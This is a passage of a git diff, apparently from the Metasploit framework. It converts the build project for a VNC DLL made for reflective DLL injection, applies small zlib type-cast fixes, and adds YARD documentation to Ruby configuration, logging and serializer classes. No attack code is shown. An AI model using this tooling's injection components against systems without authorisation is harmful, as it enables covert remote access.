WSAEWOULDBLOCK #endif diff --git a/external/source/vncdll/winvnc/WinVNC.vcproj b/external/source/vncdll/winvnc/WinVNC.vcproj deleted file mode 100644 index 4fea3fe033..0000000000 --- a/external/source/vncdll/winvnc/WinVNC.vcproj +++ /dev/null @@ -1,1200 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/external/source/vncdll/winvnc/WinVNC.vcxproj b/external/source/vncdll/winvnc/WinVNC.vcxproj new file mode 100755 index 0000000000..37efead766 --- /dev/null +++ b/external/source/vncdll/winvnc/WinVNC.vcxproj @@ -0,0 +1,473 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + Release + Win32 + + + Release + x64 + + + + winvnc + {EA6A09AC-04BB-423D-8842-CA48DF901058} + WinVNC + . + + + + DynamicLibrary + v120_xp + false + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + + + DynamicLibrary + v120_xp + false + MultiByte + + + + + + + + + + + + + + + + + + + + + + + <_ProjectFileVersion>12.0.21005.1 + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + false + false + false + $(ProjectName).$(PlatformShortName) + .dll + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + false + false + false + $(ProjectName).$(PlatformShortName) + .dll + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + true + $(ProjectName).$(PlatformShortName) + .dll + + + $(ProjectDir)$(Configuration)\$(Platform)\ + $(ProjectDir)$(Configuration)\$(Platform)\ + true + true + $(ProjectName).$(PlatformShortName) + .dll + + + + NDEBUG;%(PreprocessorDefinitions) + true + true + Win32 + + + OnlyExplicitInline + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions) + true + MultiThreaded + false + true + + true + Level3 + true + Default + + + NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0409 + + + + + + /MACHINE:I386 %(AdditionalOptions) + ws2_32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + true + type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies) + true + Windows + true + true + false + false + MachineX86 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + NDEBUG;%(PreprocessorDefinitions) + true + true + X64 + false + + + + + OnlyExplicitInline + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + WIN32;NDEBUG;_WINDOWS;__WIN32__;__NT__;__x64__;_WINSTATIC;NCORBA;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions) + true + MultiThreaded + false + true + + true + Level3 + true + Default + + + NDEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0409 + + + + + + ws2_32.lib;%(AdditionalDependencies) + $(OutDir)$(TargetName)$(TargetExt) + false + + false + Windows + true + true + + + NotSet + true + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + _DEBUG;%(PreprocessorDefinitions) + true + true + Win32 + + + Disabled + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions) + StackFrameRuntimeCheck + MultiThreadedDebug + true + + Level3 + true + ProgramDatabase + Default + + + _DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0809 + + + /MACHINE:I386 %(AdditionalOptions) + ws2_32.lib;%(AdditionalDependencies) + true + type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies) + true + Windows + false + + MachineX86 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + _DEBUG;%(PreprocessorDefinitions) + true + true + X64 + + + Disabled + ..\..\ReflectiveDLLInjection\common;./omnithread;./zlib;..;%(AdditionalIncludeDirectories) + WIN32;_DEBUG;_WINDOWS;__WIN32__;__NT__;__x86__;NCORBA;_WINSTATIC;XMD_H;_CRT_SECURE_NO_DEPRECATE;_CRT_NONSTDC_NO_DEPRECATE;%(PreprocessorDefinitions) + StackFrameRuntimeCheck + MultiThreadedDebug + true + + Level3 + true + ProgramDatabase + Default + + + _DEBUG;WITH_JAVA_VIEWER;%(PreprocessorDefinitions) + 0x0809 + + + /MACHINE:I386 %(AdditionalOptions) + ws2_32.lib;%(AdditionalDependencies) + true + type=%27win32%27 name=%27Microsoft.Windows.Common-Controls%27 version=%276.0.0.0%27 processorArchitecture=%27X86%27 publicKeyToken=%276595b64144ccf1df%27 language=%27*%27;%(AdditionalManifestDependencies) + true + Windows + false + + MachineX64 + + + editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" > NUL +exit 0 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + true + true + true + true + + + true + true + true + true + + + true + true + true + true + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/external/source/vncdll/winvnc/WinVNC.vcxproj.filters b/external/source/vncdll/winvnc/WinVNC.vcxproj.filters new file mode 100755 index 0000000000..39f04fd58a --- /dev/null +++ b/external/source/vncdll/winvnc/WinVNC.vcxproj.filters @@ -0,0 +1,527 @@ + + + + + {804c711f-35c6-4aac-9b8a-9cf8b528de85} + .cpp, .c + + + {7847cf33-fe03-48ad-9a94-a8956821f343} + .cpp, .c + + + {a328f948-40d7-4548-9451-66b620124477} + + + {cb642898-1056-43ee-828a-40004b207331} + + + {22b4b748-5baf-4a41-9ab0-ef1d45f215aa} + + + {2a00b2f1-2b80-496f-ade2-3ac76578d435} + + + {c3a89192-29f8-4ebc-b443-1032d86966d6} + .h + + + {a545ae04-19cc-401a-bb0e-fd3d7aad0f60} + + + {525d33a4-2360-47f9-9e68-24f7d54d50cb} + + + {e0e45b7e-7137-4fa7-acb3-9c57acce4c9c} + + + + + Source Files + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\encoder + + + Source Files\omnithread + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\libjpeg + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\zlib + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + Source Files\winvnc + + + + + Source Files\omnithread + + + Source Files\omnithread + + + Header Files + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\libjpeg + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\zlib + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + Header Files\winvnc + + + + + Header Files\winvnc + + + \ No newline at end of file diff --git a/external/source/vncdll/winvnc/vncDesktop.cpp b/external/source/vncdll/winvnc/vncDesktop.cpp old mode 100644 new mode 100755 index 19a2b555c6..396163756e --- a/external/source/vncdll/winvnc/vncDesktop.cpp +++ b/external/source/vncdll/winvnc/vncDesktop.cpp @@ -2906,7 +2906,7 @@ bool bDbgBmDump( TCHAR szFileName[MAX_PATH]; sprintf( szFileName, - "%04u.%02u.%02u-%02u-%02u-%02u-0x%08x.bmp", + "%04u.%02u.%02u-%02u-%02u-%02u-0x%08p.bmp", stm.wYear, stm.wMonth, stm.wDay, stm.wHour, stm.wMinute, stm.wSecond, ptr); diff --git a/external/source/vncdll/winvnc/vncdll.cpp b/external/source/vncdll/winvnc/vncdll.cpp old mode 100644 new mode 100755 index e8bc8dcc93..096c2a03cd --- a/external/source/vncdll/winvnc/vncdll.cpp +++ b/external/source/vncdll/winvnc/vncdll.cpp @@ -15,7 +15,7 @@ */ #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN -#include "ReflectiveLoader.c" +#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c" HANDLE hMessageMutex = NULL; diff --git a/external/source/vncdll/winvnc/zlib/inffast.c b/external/source/vncdll/winvnc/zlib/inffast.c old mode 100644 new mode 100755 index aa7f1d4d2a..90455987cb --- a/external/source/vncdll/winvnc/zlib/inffast.c +++ b/external/source/vncdll/winvnc/zlib/inffast.c @@ -99,7 +99,7 @@ z_streamp z; do { r += s->end - s->window; /* force pointer in window */ } while (r < s->window); /* covers invalid distances */ - e = s->end - r; + e = (uInt)(s->end - r); if (c > e) { c -= e; /* wrapped copy */ diff --git a/external/source/vncdll/winvnc/zlib/inflate.c b/external/source/vncdll/winvnc/zlib/inflate.c old mode 100644 new mode 100755 index dfb2e867d8..ea6e9c8333 --- a/external/source/vncdll/winvnc/zlib/inflate.c +++ b/external/source/vncdll/winvnc/zlib/inflate.c @@ -334,7 +334,7 @@ z_streamp z; } /* restore */ - z->total_in += p - z->next_in; + z->total_in += (uLong)(p - z->next_in); z->next_in = p; z->avail_in = n; z->state->sub.marker = m; diff --git a/external/source/vncdll/winvnc/zlib/infutil.h b/external/source/vncdll/winvnc/zlib/infutil.h old mode 100644 new mode 100755 index 4401df82fc..1804eb984f --- a/external/source/vncdll/winvnc/zlib/infutil.h +++ b/external/source/vncdll/winvnc/zlib/infutil.h @@ -64,7 +64,7 @@ struct inflate_blocks_state { /* defines for inflate input/output */ /* update pointers and return */ #define UPDBITS {s->bitb=b;s->bitk=k;} -#define UPDIN {z->avail_in=n;z->total_in+=p-z->next_in;z->next_in=p;} +#define UPDIN {z->avail_in=n;z->total_in+=(uLong)(p-z->next_in);z->next_in=p;} #define UPDOUT {s->write=q;} #define UPDATE {UPDBITS UPDIN UPDOUT} #define LEAVE {UPDATE return inflate_flush(s,z,r);} diff --git a/lib/msf/base/config.rb b/lib/msf/base/config.rb index 951c556adc..b5a8b2f40f 100644 --- a/lib/msf/base/config.rb +++ b/lib/msf/base/config.rb @@ -3,22 +3,16 @@ require 'fileutils' module Msf -### -# # This class wraps interaction with global configuration that can be used as a # persistent storage point for configuration, logs, and other such fun things. -# -### class Config < Hash - # - # The installation root directory for the distribution - # + # The installation's root directory for the distribution InstallRoot = File.expand_path(File.join(File.dirname(__FILE__), '..', '..', '..')) - # # Determines the base configuration directory. # + # @return [String] the base configuration directory def self.get_config_root # Use MSFCFGDIR environment variable first. See feature request #5797 @@ -47,7 +41,11 @@ class Config < Hash # # Default values # + + # Default system file separator. FileSep = File::SEPARATOR + + # Default configuration locations. Defaults = { 'ConfigDirectory' => get_config_root, @@ -68,247 +66,260 @@ class Config < Hash # ## - # # Returns the framework installation root. # + # @return [String] the framework installation root {InstallRoot}. def self.install_root InstallRoot end + # Returns the configuration directory default. # - # Calls the instance method. - # + # @return [String] the root configuration directory. def self.config_directory self.new.config_directory end + # Returns the global module directory. # - # Calls the instance method. - # + # @return [String] path to global module directory. def self.module_directory self.new.module_directory end + # Returns the path that scripts can be loaded from. # - # Calls the instance method. - # + # @return [String] path to script directory. def self.script_directory self.new.script_directory end + # Returns the directory that log files should be stored in. # - # Calls the instance method. - # + # @return [String] path to log directory. def self.log_directory self.new.log_directory end + # Returns the directory that plugins are stored in. # - # Calls the instance method. - # + # @return [String] path to plugin directory. def self.plugin_directory self.new.plugin_directory end + # Returns the user-specific plugin base path # - # Calls the instance method. - # + # @return [String] path to user-specific plugin directory. def self.user_plugin_directory self.new.user_plugin_directory end + # Returns the directory in which session log files are to reside. # - # Calls the instance method. - # + # @return [String] path to session log directory. def self.session_log_directory self.new.session_log_directory end + # Returns the directory in which captured data will reside. # - # Calls the instance method. - # + # @return [String] path to loot directory. def self.loot_directory self.new.loot_directory end + # Returns the directory in which locally-generated data will reside. # - # Calls the instance method. - # + # @return [String] path to locally-generated data directory. def self.local_directory self.new.local_directory end + # Returns the user-specific module base path # - # Calls the instance method. - # + # @return [String] path to user-specific modules directory. def self.user_module_directory self.new.user_module_directory end + # Returns the user-specific script base path # - # Calls the instance method. - # + # @return [String] path to user-specific script directory. def self.user_script_directory self.new.user_script_directory end + # Returns the data directory # - # Calls the instance method. - # + # @return [String] path to data directory. def self.data_directory self.new.data_directory end + # Returns the full path to the configuration file. # - # Calls the instance method. - # + # @return [String] path to the configuration file. def self.config_file self.new.config_file end + # Returns the full path to the history file. # - # Calls the instance method. - # + # @return [String] path the history file. def self.history_file self.new.history_file end + # Initializes configuration, creating directories as necessary. # - # Calls the instance method. - # + # @return [void] def self.init self.new.init end + # Loads configuration from the supplied file path, or the default one if + # none is specified. # - # Calls the instance method. - # + # @param path [String] the path to the configuration file. + # @return [Rex::Parser::Ini] INI file parser. def self.load(path = nil) self.new.load(path) end + # Saves configuration to the path specified in the ConfigFile hash key or + # the default path if one isn't specified. The options should be group + # references that have named value pairs. # - # Calls the instance method. - # + # @param opts [Hash] Hash containing configuration options. + # @option opts 'ConfigFile' [Hash] configuration file these options apply + # to. + # @return [void] + # @example Save 'Cat' => 'Foo' in group 'ExampleGroup' + # save( + # 'ExampleGroup' => + # { + # 'Foo' => 'Cat' + # }) def self.save(opts) self.new.save(opts) end - # # Updates the config class' self with the default hash. # + # @return [Hash] the updated Hash. def initialize update(Defaults) end - # # Returns the installation root directory # + # @return [String] the installation root directory {InstallRoot}. def install_root InstallRoot end - # # Returns the configuration directory default. # + # @return [String] the root configuration directory. def config_directory self['ConfigDirectory'] end - # # Returns the full path to the configuration file. # + # @return [String] path to the configuration file. def config_file config_directory + FileSep + self['ConfigFile'] end + # Returns the full path to the history file. # - # Returns the full path to the configuration file. - # + # @return [String] path the history file. def history_file config_directory + FileSep + "history" end - # # Returns the global module directory. # + # @return [String] path to global module directory. def module_directory install_root + FileSep + self['ModuleDirectory'] end - # # Returns the path that scripts can be loaded from. # + # @return [String] path to script directory. def script_directory install_root + FileSep + self['ScriptDirectory'] end - # # Returns the directory that log files should be stored in. # + # @return [String] path to log directory. def log_directory config_directory + FileSep + self['LogDirectory'] end - # # Returns the directory that plugins are stored in. # + # @return [String] path to plugin directory. def plugin_directory install_root + FileSep + self['PluginDirectory'] end - # # Returns the directory in which session log files are to reside. # + # @return [String] path to session log directory. def session_log_directory config_directory + FileSep + self['SessionLogDirectory'] end - # # Returns the directory in which captured data will reside. # + # @return [String] path to loot directory. def loot_directory config_directory + FileSep + self['LootDirectory'] end - # # Returns the directory in which locally-generated data will reside. # + # @return [String] path to locally-generated data directory. def local_directory config_directory + FileSep + self['LocalDirectory'] end - # # Returns the user-specific module base path # + # @return [String] path to user-specific modules directory. def user_module_directory config_directory + FileSep + "modules" end - # # Returns the user-specific plugin base path # + # @return [String] path to user-specific plugin directory. def user_plugin_directory config_directory + FileSep + "plugins" end - # # Returns the user-specific script base path # + # @return [String] path to user-specific script directory. def user_script_directory config_directory + FileSep + "scripts" end - # # Returns the data directory # + # @return [String] path to data directory. def data_directory install_root + FileSep + self['DataDirectory'] end - # # Initializes configuration, creating directories as necessary. # + # @return [void] def init FileUtils.mkdir_p(module_directory) FileUtils.mkdir_p(config_directory) @@ -320,27 +331,31 @@ class Config < Hash FileUtils.mkdir_p(user_plugin_directory) end - # # Loads configuration from the supplied file path, or the default one if # none is specified. # + # @param path [String] the path to the configuration file. + # @return [Rex::Parser::Ini] INI file parser. def load(path = nil) path = config_file if (!path) return Rex::Parser::Ini.new(path) end - # # Saves configuration to the path specified in the ConfigFile hash key or - # the default path is one isn't specified. The options should be group - # references that have named value pairs. Example: - # - # save( - # 'ExampleGroup' => - # { - # 'Foo' => 'Cat' - # }) + # the default path if one isn't specified. The options should be group + # references that have named value pairs. # + # @param opts [Hash] Hash containing configuration options. + # @option opts 'ConfigFile' [Hash] configuration file these options apply + # to. + # @return [void] + # @example Save 'Cat' => 'Foo' in group 'ExampleGroup' + # save( + # 'ExampleGroup' => + # { + # 'Foo' => 'Cat' + # }) def save(opts) ini = Rex::Parser::Ini.new(opts['ConfigFile'] || config_file) diff --git a/lib/msf/base/logging.rb b/lib/msf/base/logging.rb index ccf6315dc9..0a0c475c5b 100644 --- a/lib/msf/base/logging.rb +++ b/lib/msf/base/logging.rb @@ -4,19 +4,19 @@ require 'msf/base' module Msf -### -# # This module provides an initialization interface for logging. -# -### class Logging + #Is logging initialized + #@private @@initialized = false + #Is session logging enabled + #@private @@session_logging = false - # # Initialize logging. # + # @return [void] def self.init if (! @@initialized) @@initialized = true @@ -35,9 +35,13 @@ class Logging end end + # Enables a log source of name src. Creates the .log file in the + # configured directory if logging is not already enabled for this + # source. # - # Enables a log source. - # + # @param src [String] log source name. + # @param level [Integer] logging level. + # @return [void] def self.enable_log_source(src, level = 0) if (log_source_registered?(src) == false) f = Rex::Logging::Sinks::Flatfile.new( @@ -47,30 +51,33 @@ class Logging end end - # # Stops logging for a given log source. # + # @param src [String] the log source to disable. + # @return [Boolean] true if successful. false if not. def self.disable_log_source(src) deregister_log_source(src) end - # # Sets whether or not session logging is to be enabled. # + # @param tf [Boolean] true if enabling. false if disabling. + # @return [void] def self.enable_session_logging(tf) @@session_logging = tf end - # # Returns whether or not session logging is enabled. # + # @return [Boolean] true if enabled. false if disabled. def self.session_logging_enabled? @@session_logging || false end - # # Starts logging for a given session. # + # @param session [Msf::Session] the session to start logging on. + # @return [void] def self.start_session_log(session) if (log_source_registered?(session.log_source) == false) f = Rex::Logging::Sinks::Flatfile.new( @@ -82,9 +89,10 @@ class Logging end end - # # Stops logging for a given session. # + # @param session [Msf::Session] the session to stop logging. + # @return [Boolean] true if sucessful. false if not. def self.stop_session_log(session) rlog("\n[*] Logging stopped: #{Time.now}\n\n", session.log_source) diff --git a/lib/msf/base/persistent_storage.rb b/lib/msf/base/persistent_storage.rb index 8cbac93137..b7f93a01f6 100644 --- a/lib/msf/base/persistent_storage.rb +++ b/lib/msf/base/persistent_storage.rb @@ -1,24 +1,25 @@ # -*- coding: binary -*- module Msf -### -# # This class provides a generalized interface to persisting information, # either in whole or in part, about the state of the framework. This can # be used to store data that can later be reinitialized in a new instance # of the framework or to provide a simple mechanism for generating reports # of some form. # -### +# @abstract Subclass and override {#initialize}, {#store}, and {#fetch}. class PersistentStorage @@storage_classes = {} - # # Creates an instance of the storage class with the supplied name. The # array supplied as an argument is passed to the constructor of the # associated class as a means of generic initialization. # + # @param name [String] the name of the storage class. + # @param params [Object] the parameters to give the new class. + # @return [PersistentStorage] the newly created class. + # @return [nil] if class has not been added through {.add_storage_class}. def self.create(name, *params) if (klass = @@storage_classes[name]) klass.new(*params) @@ -27,36 +28,42 @@ class PersistentStorage end end - # # Stub initialization routine that takes the params passed to create. # + # @param params [Object] the parameters to initialize with. def initialize(*params) end - # # This methods stores all or part of the current state of the supplied # framework instance to whatever medium the derived class implements. # If the derived class does not implement this method, the # NotImplementedError is raised. # + # @param framework [Msf::Framework] framework state to store. + # @return [void] no implementation. + # @raise [NotImpementedError] raised if not implemented. def store(framework) raise NotImplementedError end - # # This method initializes the supplied framework instance with the state # that is stored in the persisted backing that the derived class # implements. If the derived class does not implement this method, the # NotImplementedError is raised. # + # @param framework [Msf::Framework] framework to restore state to. + # @return [void] no implementation. + # @raise [NotImplementedError] raised if not implemented. def fetch(framework) raise NotImplementedError end - # # This method adds a new storage class to the hash of storage classes that # can be created through create. # + # @param name [String] the name of the storage class. + # @param klass [PersistentStorage] the storage class to add. + # @return [void] def self.add_storage_class(name, klass) @@storage_classes[name] = klass end diff --git a/lib/msf/base/persistent_storage/flatfile.rb b/lib/msf/base/persistent_storage/flatfile.rb index 15ce4bb94e..aa4c724ba9 100644 --- a/lib/msf/base/persistent_storage/flatfile.rb +++ b/lib/msf/base/persistent_storage/flatfile.rb @@ -2,30 +2,29 @@ module Msf class PersistentStorage -### -# # This class persists the state of the framework to a flatfile in a human # readable format. At the moment, the level of information it conveys is # rather basic and ugly, but this is just a prototype, so it will be improved. # Oh yes, it will be improved. -# -### class Flatfile < PersistentStorage - # # Initializes the flatfile for storage based on the parameters specified. # The hash must contain a FilePath attribute. # + # @overload initialize(path) + # Initializes the flatfile with the set path. + # @param path [String] path of the flatfile. def initialize(*params) raise ArgumentError, "You must specify a file path" if (params.length == 0) self.path = params[0] end - # # This method stores the current state of the framework in human readable # form to a flatfile. This can be used as a reporting mechanism. # + # @param framework [Msf:::Framework] the Framework to store. + # @return [void] def store(framework) # Open the supplied file path for writing. self.fd = File.new(self.path, "w") @@ -41,10 +40,11 @@ protected attr_accessor :fd, :path # :nodoc: - # # This method stores general information about the current state of the # framework instance. # + # @param framework [Msf::Framework] the Framework to store. + # @return [void] def store_general(framework) fd.print( "\n" + diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 3e018a188c..5200b4d14c 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -2,22 +2,22 @@ module Msf module Serializer -### -# # This class formats information in a plain-text format that # is meant to be displayed on a console or some other non-GUI # medium. -# -### class ReadableText + #Default number of characters to wrap at. DefaultColumnWrap = 70 + #Default number of characters to indent. DefaultIndent = 2 - # # Returns a formatted string that contains information about # the supplied module instance. # + # @param mod [Msf::Module] the module to dump information for. + # @param indent [String] the indentation to use. + # @return [String] formatted text output of the dump. def self.dump_module(mod, indent = " ") case mod.type when MODULE_PAYLOAD @@ -37,9 +37,14 @@ class ReadableText end end - # # Dumps an exploit's targets. # + # @param mod [Msf::Exploit] the exploit module to dump targets + # for. + # @param indent [String] the indentation to use (only the length + # matters). + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_exploit_targets(mod, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -57,9 +62,13 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps the exploit's selected target # + # @param mod [Msf::Exploit] the exploit module. + # @param indent [String] the indentation to use (only the length + # matters) + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_exploit_target(mod, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -75,9 +84,13 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps an auxiliary's actions # + # @param mod [Msf::Auxiliary] the auxiliary module. + # @param indent [String] the indentation to use (only the length + # matters) + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_auxiliary_actions(mod, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -95,10 +108,14 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps the table of payloads that are compatible with the supplied # exploit. # + # @param exploit [Msf::Exploit] the exploit module. + # @param indent [String] the indentation to use (only the length + # matters) + # @param h [String] the string to display as the table heading. + # @return [String] the string form of the table. def self.dump_compatible_payloads(exploit, indent = '', h = nil) tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -116,9 +133,11 @@ class ReadableText tbl.to_s + "\n" end - # # Dumps information about an exploit module. # + # @param mod [Msf::Exploit] the exploit module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_exploit_module(mod, indent = '') output = "\n" output << " Name: #{mod.name}\n" @@ -171,9 +190,11 @@ class ReadableText end - # # Dumps information about an auxiliary module. # + # @param mod [Msf::Auxiliary] the auxiliary module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_auxiliary_module(mod, indent = '') output = "\n" output << " Name: #{mod.name}\n" @@ -207,9 +228,11 @@ class ReadableText return output end - # # Dumps information about a payload module. # + # @param mod [Msf::Payload] the payload module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_payload_module(mod, indent = '') # General output = "\n" @@ -244,9 +267,11 @@ class ReadableText return output end - # # Dumps information about a module, just the basics. # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_basic_module(mod, indent = '') # General output = "\n" @@ -277,13 +302,16 @@ class ReadableText end + #No current use def self.dump_generic_module(mod, indent = '') end - # # Dumps the list of options associated with the # supplied module. # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_options(mod, indent = '') tbl = Rex::Ui::Text::Table.new( 'Indent' => indent.length, @@ -309,9 +337,11 @@ class ReadableText return tbl.to_s end - # # Dumps the advanced options associated with the supplied module. # + # @param mod [Msf::Module] the module. + # @param indent [String] the indentation to use. + # @return [String] the string form of the information. def self.dump_advanced_options(mod, indent = '') output = '' pad = indent @@ -333,9 +363,11 @@ class ReadableText return output end - # # Dumps the evasion options associated with the supplied module. # + # @param mod 